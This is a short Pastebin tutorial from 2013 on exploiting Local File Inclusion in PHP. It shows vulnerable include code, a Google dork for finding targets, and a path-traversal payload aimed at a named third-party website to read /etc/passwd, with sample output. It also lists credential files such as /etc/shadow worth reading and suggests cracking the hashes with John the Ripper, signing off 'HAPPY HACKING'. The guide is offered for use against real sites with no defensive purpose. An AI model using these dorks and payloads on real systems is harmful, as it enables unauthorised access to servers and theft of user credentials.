87aCk_X

L0C@l f!l3 inclu$ioN

Aug 30th, 2013
135
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ...::Local File Inclusion (LFI)::...
  2.  
  3. First of all, an example of a vulnerable PHP code is this:
  4. Code:
  5. $page = $_GET[page];
  6. include($page);
  7. ?>
  8.  
  9. Now, here's a google dork:
  10. Code:
  11. inurl:redirect.php?page=
  12.  
  13. Search that in google, and you should come up with a link like this:
  14. Code:
  15. http://www.x17agency.com/redirect.php?page=_CLI/contact.php
  16.  
  17. To test if it's vulnerable, please put this code in:
  18. Code:
  19. http://www.x17agency.com/redirect.php?page=../../../../../etc/passwd
  20.  
  21. After you have put that code in, which is "../../../../../etc/passwd", you should come up with something like this:
  22.  
  23. ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # This file will not be consulted for authentication unless the BSD local node # is enabled via /Applications/Utilities/Directory Utility.app # # See the DirectoryService(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false _pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false _serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false _xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
  24.  
  25.  
  26. A non-shadowed file would look like this:
  27. Code:
  28. username:passwd:UID:GID:full_name:directory:shell
  29.  
  30. All you have to do is decode the password.
  31.  
  32. Here are some "interesting" places you might want to visit:
  33. Code:
  34. /etc/passwd
  35. /etc/shadow
  36. /etc/group
  37. /etc/security/group
  38. /etc/security/passwd
  39. /etc/security/user
  40. /etc/security/environ
  41. /etc/security/limits
  42. /usr/lib/security/mkuser.default
  43.  
  44. Q&A
  45. How to decode the pass?
  46. Use john the rippers decoder :)
  47.  
  48. HAPPY HACKING ;D
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×